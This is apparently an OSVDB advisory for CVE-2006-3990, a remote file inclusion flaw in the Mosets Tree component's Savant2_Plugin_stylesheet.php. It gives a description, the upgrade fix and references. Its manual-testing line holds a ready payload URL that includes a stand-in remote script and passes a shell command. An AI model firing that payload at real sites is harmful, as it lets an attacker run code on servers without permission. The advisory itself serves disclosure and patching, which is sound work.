Mosets Tree Savant2_Plugin_stylesheet.php mosConfig_absolute_path Variable Remote File Inclusion

2006-07-21T23:50:40
ID OSVDB:28711
Type osvdb
Reporter Botan(botanlinuxmail.org)
Modified 2006-07-21T23:50:40

Description

Vulnerability Description

Mosets Tree contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the Savant2_Plugin_stylesheet.php script not properly sanitizing user input supplied to the 'mosConfig_absolute_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Upgrade to version 1.5.9 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

Mosets Tree contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the Savant2_Plugin_stylesheet.php script not properly sanitizing user input supplied to the 'mosConfig_absolute_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/[mam_jom_path]/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=EvilScript.txt?&cmd=id

References:

Vendor URL: http://www.mosets.com/tree/ Vendor URL: http://www.phpsavant.com/yawiki/ Vendor Specific News/Changelog Entry: http://forum.mosets.com/showthread.php?t=3625 Security Tracker: 1016560 Mail List Post: http://attrition.org/pipermail/vim/2006-September/001022.html Mail List Post: http://attrition.org/pipermail/vim/2006-September/001024.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0370.html Keyword: [Kurdish Security # 13],Savant Template System for PHP ISS X-Force ID: 27906 CVE-2006-3990 Bugtraq ID: 19151